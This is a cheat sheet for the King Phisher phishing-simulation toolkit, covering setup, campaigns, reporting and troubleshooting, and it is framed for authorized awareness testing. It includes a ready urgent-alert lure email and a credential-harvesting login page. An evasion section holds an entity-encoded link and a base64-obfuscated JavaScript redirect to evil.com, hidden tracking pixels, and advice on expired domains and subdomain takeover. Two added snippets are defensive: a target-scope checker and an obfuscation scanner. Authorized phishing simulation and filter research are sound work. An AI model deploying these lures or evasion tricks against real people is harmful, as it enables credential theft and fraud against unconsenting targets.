
King Phisher Social Engineering Toolkit Cheat Sheet

Overview

King Phisher is a professional-grade phishing campaign toolkit developed by RSM US LLP for testing and promoting user awareness by simulating real-world phishing attacks. It provides a complete framework for creating, managing, and analyzing phishing campaigns with advanced reporting capabilities.

⚠️ Warning: This tool is intended for authorized security testing and awareness training only. Ensure you have proper authorization before conducting any phishing campaigns.

Installation

Ubuntu/Debian Installation

bash
# Install via package manager (only on distributions that ship a king-phisher package)
sudo apt update
sudo apt install king-phisher

# Manual installation
git clone https://github.com/rsmusllp/king-phisher.git
cd king-phisher
sudo ./tools/install.sh

CentOS/RHEL Installation

bash
# Install dependencies
sudo yum install python3 python3-pip git

# Clone repository
git clone https://github.com/rsmusllp/king-phisher.git
cd king-phisher

# Install Python dependencies
pip3 install -r requirements.txt

# Install King Phisher
sudo ./tools/install.sh

Docker Installation

bash
# Build Docker image
git clone https://github.com/rsmusllp/king-phisher.git
cd king-phisher
docker build -t king-phisher .

# Run King Phisher server
docker run -it -p 80:80 -p 443:443 king-phisher

Basic Usage

Starting King Phisher Server

bash
# Start server with default configuration
sudo king-phisher-server

# Start with custom configuration
sudo king-phisher-server -c /path/to/config.yml

# Start with specific interface
sudo king-phisher-server -a 0.0.0.0

# Start with custom port
sudo king-phisher-server -p 8080

Starting King Phisher Client

bash
# Start GUI client
king-phisher-client

# Connect to remote server
king-phisher-client --server https://server.com

# Use specific configuration
king-phisher-client --config /path/to/client_config.json

Configuration

Server Configuration (server_config.yml)

yaml
# Basic server configuration
server:
  bind:
    host: 0.0.0.0
    port: 80
  ssl:
    enabled: true
    host: 0.0.0.0
    port: 443
    cert: /path/to/cert.pem
    key: /path/to/key.pem

# Database configuration
database:
  driver: postgresql
  host: localhost
  port: 5432
  database: king_phisher
  username: king_phisher
  password: password  # placeholder: replace with a strong, unique secret

# Email configuration
email:
  smtp:
    host: smtp.gmail.com
    port: 587
    username: your-email@gmail.com
    password: app-password
    use_tls: true

# Logging configuration
logging:
  level: INFO
  file: /var/log/king-phisher.log

Client Configuration

json
{
  "server": "https://king-phisher.local",
  "server_username": "username",
  "server_use_ssl": true,
  "server_verify_ssl": false,
  "gui": {
    "show_campaign_graph": true,
    "show_campaign_map": true
  }
}

Campaign Management

Creating Campaigns

bash
# Campaign components:
# 1. Email template
# 2. Landing page
# 3. Target list
# 4. SMTP configuration
# 5. Campaign settings

Email Templates

html
<!-- Professional phishing template -->
<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <title>Security Alert</title>
    <style>
        body { font-family: Arial, sans-serif; margin: 20px; }
        .header { background: #d32f2f; color: white; padding: 10px; }
        .content { padding: 20px; }
        .button { background: #1976d2; color: white; padding: 10px 20px; text-decoration: none; }
    </style>
</head>
<body>
    <div class="header">
        <h2>Security Alert - Immediate Action Required</h2>
    </div>
    <div class="content">
        <p>Dear {{ client.first_name }} {{ client.last_name }},</p>
        <p>We have detected suspicious activity on your account associated with {{ client.email_address }}.</p>
        <p>Please verify your account immediately to prevent suspension.</p>
        <p><a href="{{ url.webserver }}" class="button">Verify Account Now</a></p>
        <p>This link will expire in 24 hours.</p>
        <p>Best regards,<br>IT Security Team</p>
    </div>
</body>
</html>

Landing Pages

html
<!-- Credential harvesting page -->
<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <title>Account Verification</title>
    <style>
        body { font-family: Arial, sans-serif; background: #f5f5f5; margin: 0; padding: 50px; }
        .container { max-width: 400px; margin: auto; background: white; padding: 30px; border-radius: 5px; box-shadow: 0 2px 10px rgba(0,0,0,0.1); }
        input { width: 100%; padding: 12px; margin: 10px 0; border: 1px solid #ddd; border-radius: 3px; }
        button { width: 100%; background: #1976d2; color: white; padding: 12px; border: none; border-radius: 3px; cursor: pointer; }
        .logo { text-align: center; margin-bottom: 30px; }
    </style>
</head>
<body>
    <div class="container">
        <div class="logo">
            <h2>Account Verification</h2>
        </div>
        <form method="post" action="{{ url.webserver }}">
            <input type="hidden" name="rid" value="{{ client.uid }}">
            <input type="text" name="username" placeholder="Username or Email" required>
            <input type="password" name="password" placeholder="Password" required>
            <button type="submit">Verify Account</button>
        </form>
        <p style="font-size: 12px; color: #666; text-align: center; margin-top: 20px;">
            This verification is required to maintain account security.
        </p>
    </div>
</body>
</html>

Target Lists

csv
# CSV format for target import
first_name,last_name,email_address,department,company
John,Doe,john.doe@company.com,IT,Acme Corp
Jane,Smith,jane.smith@company.com,HR,Acme Corp
Bob,Johnson,bob.johnson@company.com,Finance,Acme Corp
Alice,Williams,alice.williams@company.com,Marketing,Acme Corp
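
A pre-import scope check for the target list layout above, as an added example (not part of King Phisher or of the original cheat sheet): it rejects addresses outside the authorized mail domains, duplicates and malformed rows. The `check_targets` function, the `authorized_domains` parameter and the sample rows are assumptions constructed for illustration.

```python
import csv
import io

REQUIRED = ["first_name", "last_name", "email_address"]


def check_targets(csv_text, authorized_domains):
    """Return (accepted_rows, rejected) where rejected holds (line_number, reason).

    authorized_domains: mail domains named in the written authorization.
    Assumes one record per line (no quoted multi-line fields).
    """
    allowed = {d.lower() for d in authorized_domains}
    # Drop blank and '#' comment lines but remember the original line numbers.
    lines = [(n, text) for n, text in enumerate(csv_text.splitlines(), 1)
             if text.strip() and not text.lstrip().startswith("#")]
    if not lines:
        raise ValueError("empty target list")
    reader = csv.DictReader(io.StringIO("\n".join(text for _, text in lines)))
    missing = [c for c in REQUIRED if c not in (reader.fieldnames or [])]
    if missing:
        raise ValueError(f"missing columns: {missing}")

    accepted, rejected, seen = [], [], set()
    for (line_no, _), row in zip(lines[1:], reader):
        email = (row["email_address"] or "").strip().lower()
        local, sep, domain = email.rpartition("@")
        if not (sep and local and domain):
            rejected.append((line_no, "malformed address"))
        elif domain not in allowed:
            rejected.append((line_no, f"out of scope: {domain}"))
        elif email in seen:
            rejected.append((line_no, "duplicate"))
        else:
            seen.add(email)
            accepted.append(row)
    return accepted, rejected


# Constructed sample: one valid row, one out-of-scope, one duplicate, one malformed.
SAMPLE_TARGETS = """\
# Constructed sample rows, same columns as the list above
first_name,last_name,email_address,department,company
John,Doe,john.doe@company.com,IT,Acme Corp
Eve,Ext,eve@partner.example,Sales,Partner Ltd
Jane,Smith,JOHN.DOE@company.com,HR,Acme Corp
Bob,Johnson,bob.johnson,Finance,Acme Corp
"""

if __name__ == "__main__":
    ok, bad = check_targets(SAMPLE_TARGETS, {"company.com"})
    print(len(ok), "accepted;", bad)
```

Import only the accepted rows and keep the rejected list with the engagement records.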

Advanced Features

Template Variables

html
<!-- Available template variables -->
{{ client.first_name }}        <!-- Target's first name -->
{{ client.last_name }}         <!-- Target's last name -->
{{ client.email_address }}     <!-- Target's email -->
{{ client.company_name }}      <!-- Target's company -->
{{ client.department }}        <!-- Target's department -->
{{ url.webserver }}            <!-- Tracking URL -->
{{ url.tracking_image }}       <!-- Tracking pixel -->
{{ time.local }}               <!-- Local timestamp -->
{{ time.utc }}                 <!-- UTC timestamp -->

Custom Fields

python
# Add custom fields to campaigns
custom_fields = {
    'employee_id': 'EMP001',
    'manager': 'John Manager',
    'location': 'New York Office',
    'security_level': 'Standard'
}

Plugins and Extensions

python
# King Phisher client plugin structure
import king_phisher.client.plugins as plugins

# The client plugin loader expects the class to be named "Plugin"
class Plugin(plugins.ClientPlugin):
    authors = ['Your Name']
    title = 'Custom Plugin'
    description = 'Custom functionality for King Phisher'
    version = '1.0'

    def initialize(self):
        # Plugin initialization code; return True to signal success
        return True

    def finalize(self):
        # Plugin cleanup code
        pass

Reporting and Analytics

Campaign Statistics

python
# Access campaign data via API
import king_phisher.client.client_rpc as client_rpc

# Connect to server
rpc = client_rpc.KingPhisherRPCClient(
    ('server.com', 443),
    username='admin',
    password='password',
    use_ssl=True
)

# Get campaign statistics
campaign_id = 1
stats = rpc.remote_table_row('campaigns', campaign_id)
# remote_table() may yield rows lazily, so materialize them before calling len()
messages = list(rpc.remote_table('messages', query_filter={'campaign_id': campaign_id}))
visits = list(rpc.remote_table('visits', query_filter={'campaign_id': campaign_id}))
credentials = list(rpc.remote_table('credentials', query_filter={'campaign_id': campaign_id}))

print(f"Messages sent: {len(messages)}")
print(f"Visits: {len(visits)}")
print(f"Credentials harvested: {len(credentials)}")

Geographic Analysis

python
# Analyze visitor geographic data
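import geoip2.database
import geoip2.errors

def analyze_visitor_locations(visits):
    locations = {}

    # The context manager closes the database file when done
    with geoip2.database.Reader('/path/to/GeoLite2-City.mmdb') as reader:
        for visit in visits:
            try:
                response = reader.city(visit['visitor_ip'])
            except (geoip2.errors.AddressNotFoundError, ValueError):
                # Address not in the database, or not a valid IP: skip it
                continue

            country = response.country.name or 'Unknown'
            city = response.city.name or 'Unknown'

            location = f"{city}, {country}"
            locations[location] = locations.get(location, 0) + 1

    return locations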

Timeline Analysis

python
# Analyze campaign timeline
import datetime
import matplotlib.pyplot as plt

def plot_campaign_timeline(visits):
    timestamps = [datetime.datetime.fromisoformat(v['visit_time']) for v in visits]
    timestamps.sort()
    
    # Group by hour
    hourly_counts = {}
    for ts in timestamps:
        hour = ts.replace(minute=0, second=0, microsecond=0)
        hourly_counts[hour] = hourly_counts.get(hour, 0) + 1
    
    # Plot timeline
    hours = list(hourly_counts.keys())
    counts = list(hourly_counts.values())
    
    plt.figure(figsize=(12, 6))
    plt.plot(hours, counts, marker='o')
    plt.title('Campaign Activity Timeline')
    plt.xlabel('Time')
    plt.ylabel('Visits')
    plt.xticks(rotation=45)
    plt.tight_layout()
    plt.savefig('campaign_timeline.png')

Security Features

SSL/TLS Configuration

bash
# Generate SSL certificate
openssl req -newkey rsa:4096 -nodes -keyout king-phisher.key -x509 -days 365 -out king-phisher.crt

# Configure Let's Encrypt
certbot certonly --standalone -d yourdomain.com

Authentication and Authorization

yaml
# User authentication configuration
authentication:
  provider: pam  # or ldap, database
  
# LDAP configuration
ldap:
  server: ldap://ldap.company.com
  base_dn: dc=company,dc=com
  user_filter: (sAMAccountName={username})

# Database authentication
database_auth:
  table: users
  username_column: username
  password_column: password_hash

Access Control

python
# Role-based access control
user_permissions = {
    'admin': ['campaign.create', 'campaign.delete', 'user.manage'],
    'operator': ['campaign.create', 'campaign.view'],
    'viewer': ['campaign.view']
}

API Integration

REST API Usage

python
# King Phisher REST API client
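import requests

class KingPhisherAPI:
    def __init__(self, server_url, username, password):
        self.server_url = server_url
        self.session = requests.Session()
        # Fail early instead of issuing unauthenticated requests later
        if not self.authenticate(username, password):
            raise RuntimeError('authentication failed')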
    
    def authenticate(self, username, password):
        auth_data = {
            'username': username,
            'password': password
        }
        response = self.session.post(f"{self.server_url}/api/login", json=auth_data)
        return response.status_code == 200
    
    def get_campaigns(self):
        response = self.session.get(f"{self.server_url}/api/campaigns")
        return response.json()
    
    def create_campaign(self, campaign_data):
        response = self.session.post(f"{self.server_url}/api/campaigns", json=campaign_data)
        return response.json()
    
    def get_campaign_stats(self, campaign_id):
        response = self.session.get(f"{self.server_url}/api/campaigns/{campaign_id}/stats")
        return response.json()

Webhook Integration

python
# Webhook for real-time notifications
from flask import Flask, request

app = Flask(__name__)

@app.route('/webhook', methods=['POST'])
def handle_webhook():
    # silent=True returns None instead of raising on a non-JSON body
    data = request.get_json(silent=True)
    if not isinstance(data, dict):
        return 'Bad Request', 400

    event_type = data.get('event_type')
    if event_type == 'visit':
        # Handle website visit
        print(f"New visit from {data.get('visitor_ip')}")
    elif event_type == 'credentials':
        # Handle credential submission
        print(f"Credentials submitted: {data.get('username')}")

    return 'OK'

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=5000)

Evasion Techniques

Email Evasion

html
<!-- Use legitimate-looking domains -->
From: IT Security <security@company-portal.com>

<!-- Mimic legitimate services -->
Subject: [Action Required] Account Security Verification

<!-- Use URL shorteners or redirects -->
<a href="https://company-portal.com/redirect?url=https://evil.com">Click Here</a>

<!-- Hide tracking with CSS -->
<img src="{{ url.tracking_image }}" style="display:none;width:1px;height:1px;">

Domain Reputation

bash
# Use aged domains
# Purchase expired domains with good reputation
# Use subdomain takeover techniques
# Implement proper SPF/DKIM/DMARC records

# Example SPF record
v=spf1 include:_spf.google.com ~all

# Example DKIM record
v=DKIM1; k=rsa; p=MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC...

# Example DMARC record
v=DMARC1; p=quarantine; rua=mailto:dmarc@company.com

Content Obfuscation

html
<!-- Use HTML entities -->
<a href="&#104;&#116;&#116;&#112;&#115;&#58;&#47;&#47;&#101;&#118;&#105;&#108;&#46;&#99;&#111;&#109;">Verify Account</a>

<!-- Use base64 encoding -->
<script>
var encoded = "aHR0cHM6Ly9ldmlsLmNvbQ==";
var decoded = atob(encoded);
window.location.href = decoded;
</script>

<!-- Use CSS tricks -->
<span style="display:none;">PHISHING</span>Legitimate<span style="display:none;">ATTACK</span> Content
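
From the defender's side, the markup patterns in the Email Evasion and Content Obfuscation blocks above can be flagged with a standard HTML parser. The scanner below is an added example (not King Phisher code and not part of the original cheat sheet); the `scan` function, the finding labels and the tracker URL are assumptions, and the sample reuses the page's own snippets.

```python
import base64
import binascii
import re
from html.parser import HTMLParser

HIDDEN = re.compile(r"display\s*:\s*none", re.I)
ENTITY_HREF = re.compile(r"href\s*=\s*[\"']?[^\"'>]*&#", re.I)
B64_LITERAL = re.compile(r"[\"']([A-Za-z0-9+/]{16,}={0,2})[\"']")

class ObfuscationScanner(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings, self._in_script, self._hidden = [], False, False

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        style = attrs.get("style") or ""
        # Attribute values arrive entity-decoded, so inspect the raw tag text.
        if tag == "a" and ENTITY_HREF.search(self.get_starttag_text()):
            self.findings.append(("entity-encoded-href", attrs.get("href")))
        if tag == "img" and HIDDEN.search(style):
            self.findings.append(("hidden-image", attrs.get("src")))
        # Simplification: only the direct text of a hidden element is tracked.
        self._hidden = tag != "img" and bool(HIDDEN.search(style))
        self._in_script = tag == "script"

    def handle_endtag(self, tag):
        self._in_script = self._hidden = False

    def handle_data(self, data):
        if self._in_script:
            for literal in B64_LITERAL.findall(data):
                try:
                    text = base64.b64decode(literal, validate=True).decode("ascii")
                except (binascii.Error, UnicodeDecodeError):
                    continue  # not base64 text
                if text.startswith(("http://", "https://")):
                    self.findings.append(("base64-url-in-script", text))
        elif self._hidden and data.strip():
            self.findings.append(("hidden-text", data.strip()))

def scan(html_text):
    scanner = ObfuscationScanner()
    scanner.feed(html_text)
    scanner.close()
    return scanner.findings

# Constructed sample built from the snippets shown above; the tracker URL is made up.
SAMPLE = """
<a href="&#104;&#116;&#116;&#112;&#115;&#58;&#47;&#47;&#101;&#118;&#105;&#108;&#46;&#99;&#111;&#109;">Verify Account</a>
<script>var encoded = "aHR0cHM6Ly9ldmlsLmNvbQ=="; window.location.href = atob(encoded);</script>
<span style="display:none;">PHISHING</span>Legitimate<span style="display:none;">ATTACK</span> Content
<img src="https://tracker.example/t.gif" style="display:none;width:1px;height:1px;">
"""
```

Each finding carries the decoded value, so a mail gateway rule or analyst sees the real link target rather than the encoded form.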

Troubleshooting

Server Issues

bash
# Check server status
sudo systemctl status king-phisher

# View server logs
sudo journalctl -u king-phisher -f

# Test server connectivity
curl -k https://localhost/ping

# Check database connection
sudo -u king-phisher psql -d king_phisher -c "SELECT version();"

Email Delivery Issues

bash
# Test SMTP configuration
python3 -c "
import smtplib
server = smtplib.SMTP('smtp.gmail.com', 587)
server.starttls()
server.login('user@gmail.com', 'password')
server.quit()
print('SMTP connection successful')
"

# Check DNS records
dig TXT company.com | grep spf
dig TXT selector._domainkey.company.com  # replace "selector" with the DKIM selector in use
dig TXT _dmarc.company.com

# Test email deliverability
echo 'Test email' | mail -s 'Test Subject' test@company.com

SSL/TLS Issues

bash
# Verify certificate
openssl x509 -in /path/to/cert.pem -text -noout

# Test SSL configuration
openssl s_client -connect domain.com:443 -servername domain.com

# Check certificate chain
curl -vI https://domain.com

Performance Issues

bash
# Monitor resource usage
# -d, joins multiple PIDs with commas, the list format top -p expects
top -p "$(pgrep -d, king-phisher)"

# Check database performance
sudo -u postgres psql -d king_phisher -c "
SELECT schemaname,tablename,attname,n_distinct,correlation 
FROM pg_stats 
WHERE schemaname='public';
"

# Optimize database
sudo -u postgres psql -d king_phisher -c "VACUUM ANALYZE;"


This cheat sheet provides a comprehensive reference for using King Phisher. Always ensure you have proper authorization and follow ethical guidelines when conducting phishing simulations.